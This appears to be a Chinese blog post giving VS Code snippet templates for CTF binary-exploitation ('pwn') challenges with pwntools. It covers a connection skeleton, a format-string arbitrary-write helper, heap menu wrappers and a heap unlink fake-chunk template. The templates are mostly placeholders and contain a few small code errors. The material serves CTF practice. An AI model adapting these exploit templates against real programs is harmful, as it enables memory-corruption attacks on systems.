模板说明
代码格式为code-snippets
,可以直接复制代码命名为XXX.code-snippets
,然后导入到VScode
。导入方式这里只提供最简单的一种,依次使用”档案”->”喜好设定”->”使用者程式码片段”(此处与语言包有关,这里示例使用的语言包为”中文(繁体)”),然后点击”新增全域程式码片段档案”,记住弹出的对话框的保存目录(Ubuntu16.04
默认路径为~/.config/Code/User/snippets
),最后将XXX.code-snippets
复制到该目录下,重启VScode
即可。
一般模板
代码格式:code-snippets
,推荐命名:Pwn.code-snippets
,触发词:pwn
{
// Place your global snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and
// description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope
// is left empty or omitted, the snippet gets applied to all languages. The prefix is what is
// used to trigger the snippet and the body will be expanded and inserted. Possible variables are:
// $1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders.
// Placeholders with the same ids are connected.
// Example:
// "Print to console": {
// "scope": "javascript,typescript",
// "prefix": "log",
// "body": [
// "console.log('$1');",
// "$2"
// ],
// "description": "Log output to console"
// }
"Print to console": {
"scope": "python",
"prefix": "pwn",
"body": [
"from pwn import *",
"import sys",
"context.log_level='debug'",
"# context.arch='amd64'",
"",
"# file_name=ELF(\"./\")",
"# libc=ELF(\"./\")",
"# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
"if args['REMOTE']:",
" sh = remote(sys.argv[1], sys.argv[2])",
"else:",
" sh = process(\"./\")",
"",
"payload=",
"",
"sh.recvuntil(\"\")",
"sh.sendline(payload)",
"sh.interactive()",
"print(sh.recv())",
],
"description": "solve pwn problems!"
}
}
模板效果
from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
sh = remote(sys.argv[1], sys.argv[2])
else:
sh = process("./")
payload=
sh.recvuntil("")
sh.sendline(payload)
sh.interactive()
print(sh.recv())
格式化字符串模板
代码格式:code-snippets
,推荐命名:Pwn_fmt.code-snippets
,触发词:pwn_fmt
{
"Print to console": {
"scope": "python",
"prefix": "pwn_fmt",
"body": [
"from pwn import *",
"import sys",
"context.log_level='debug'",
"# context.arch='amd64'",
"",
"# file_name=ELF(\"./\")",
"# libc=ELF(\"./\")",
"# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
"if args['REMOTE']:",
" sh = remote(sys.argv[1], sys.argv[2])",
"else:",
" sh = process(\"./\")",
"",
"def exec_fmt(payload):",
" # sh = process(\"./\")",
" sh.recvuntil(\"\")",
" sh.sendline(payload)",
" # sh.recvline()",
" info = p.recv()",
" sh.close()",
" return info",
"",
"def fmt(prev , target):",
" if prev < target:",
" result = target - prev",
" return \"%\" + str(result) + \"c\"",
" elif prev == target:",
" return \"\"",
" else:",
" result = 0x10000 + target - prev",
" return \"%\" + str(result) + \"c\"",
"",
"def fmt64(offset , target_addr , target_value , prev = 0):",
" payload = \"\"",
" for i in range(3):",
" payload += p64(target_addr + i * 2)",
" payload2 = \"\"",
" for i in range(3):",
" target = (target_value >> (i * 16)) & 0xffff ",
" payload2 += fmt(prev , target) + \"%\" + str(offset + 8 + i) + \"$hn\"",
" prev = target",
" payload = payload2.ljust(0x40 , \"a\") + payload",
" return payload",
"",
"log.info('Now,test format string position...')",
"autofmt = FmtStr(exec_fmt)",
"print(autofmt.offset)",
"",
"payload=fmt64(format_string_position , Address , Value )",
"# payload=fmtstr_payload(format_string_position, {Address: Value})",
"sh.recvuntil(\"\")",
"# gdb.attach(sh)",
"sh.sendline(payload)",
"sh.interactive()",
"print(sh.recv())"
],
"description": "Pwn to fmt"
}
}
模板效果
from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
sh = remote(sys.argv[1], sys.argv[2])
else:
sh = process("./")
def exec_fmt(payload):
# sh = process("./")
sh.recvuntil("")
sh.sendline(payload)
# sh.recvline()
info = p.recv()
sh.close()
return info
def fmt(prev , target):
if prev < target:
result = target - prev
return "%" + str(result) + "c"
elif prev == target:
return ""
else:
result = 0x10000 + target - prev
return "%" + str(result) + "c"
def fmt64(offset , target_addr , target_value , prev = 0):
payload = ""
for i in range(3):
payload += p64(target_addr + i * 2)
payload2 = ""
for i in range(3):
target = (target_value >> (i * 16)) & 0xffff
payload2 += fmt(prev , target) + "%" + str(offset + 8 + i) + "hn"
prev = target
payload = payload2.ljust(0x40 , "a") + payload
return payload
log.info('Now,test format string position...')
autofmt = FmtStr(exec_fmt)
print(autofmt.offset)
payload=fmt64(format_string_position , Address , Value )
# payload=fmtstr_payload(format_string_position, {Address: Value})
sh.recvuntil("")
# gdb.attach(sh)
sh.sendline(payload)
sh.interactive()
print(sh.recv())
一般堆利用模板
代码格式:code-snippets
,推荐命名:Pwn_heap.code-snippets
,触发词:pwn_heap
{
"Print to console": {
"scope": "python",
"prefix": "pwn_heap",
"body": [
"from pwn import *",
"import sys",
"context.log_level='debug'",
"# context.arch='amd64'",
"",
"# file_name=ELF(\"./\")",
"# libc=ELF(\"./\")",
"# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
"if args['REMOTE']:",
" sh = remote(sys.argv[1], sys.argv[2])",
"else:",
" sh = process(\"./\")",
"def creat(chunk_size,value):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(chunk_size))",
" sh.recvuntil('')",
" sh.sendline(value)",
"",
"def delete(index):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(index))",
"",
"def show(index):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(index))",
"",
"def edit(index,value):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(index))",
" sh.recvuntil('')",
" sh.sendline(value)",
"",
"sh.interactive()",
"print(sh.recv())"
],
"description": "Pwn to heap"
}
}
模板效果
from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
sh = remote(sys.argv[1], sys.argv[2])
else:
sh = process("./")
def creat(chunk_size,value):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(chunk_size))
sh.recvuntil('')
sh.sendline(value)
def delete(index):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(index))
def show(index):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(index))
def edit(index,value):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(index))
sh.recvuntil('')
sh.sendline(value)
sh.interactive()
print(sh.recv())
Unlink
利用模板
代码格式:code-snippets
,推荐命名:Pwn_heap_unlink.code-snippets
,触发词:pwn_heap_unlink
{
"Print to console": {
"scope": "python",
"prefix": "pwn_heap_unlink",
"body": [
"from pwn import *",
"import sys",
"context.log_level='debug'",
"# context.arch='amd64'",
"",
"# file_name=ELF(\"./\")",
"# libc=ELF(\"./\")",
"# ELF(\"/lib/x86_64-linux-gnu/libc.so.6\")",
"if args['REMOTE']:",
" sh = remote(sys.argv[1], sys.argv[2])",
"else:",
" sh = process(\"./\")",
"def creat(chunk_size,value):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(chunk_size))",
" sh.recvuntil('')",
" sh.sendline(value)",
"",
"def delete(index):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(index))",
"",
"def show(index):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(index))",
"",
"def edit(index,value):",
" sh.recvuntil('')",
" sh.sendline('')",
" sh.recvuntil('')",
" sh.sendline(str(index))",
" sh.recvuntil('')",
" sh.sendline(value)",
"",
"target_addr=",
"fd=target_addr - 0x18",
"bk=target_addr - 0x10",
"fake_chunk='a'*0x8 # prev_size",
"fake_chunk+=p64() # size",
"fake_chunk+=p64(fd)+p64(bk)",
"fake_chunk+='a'* #padding",
"",
"sh.interactive()",
"print(sh.recv())"
],
"description": "Pwn to heap unlink"
}
}
模板效果
from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'
# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
sh = remote(sys.argv[1], sys.argv[2])
else:
sh = process("./")
def creat(chunk_size,value):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(chunk_size))
sh.recvuntil('')
sh.sendline(value)
def delete(index):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(index))
def show(index):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(index))
def edit(index,value):
sh.recvuntil('')
sh.sendline('')
sh.recvuntil('')
sh.sendline(str(index))
sh.recvuntil('')
sh.sendline(value)
target_addr=
fd=target_addr - 0x18
bk=target_addr - 0x10
fake_chunk='a'*0x8 # prev_size
fake_chunk+=p64() # size
fake_chunk+=p64(fd)+p64(bk)
fake_chunk+='a'* #padding
sh.interactive()
print(sh.recv())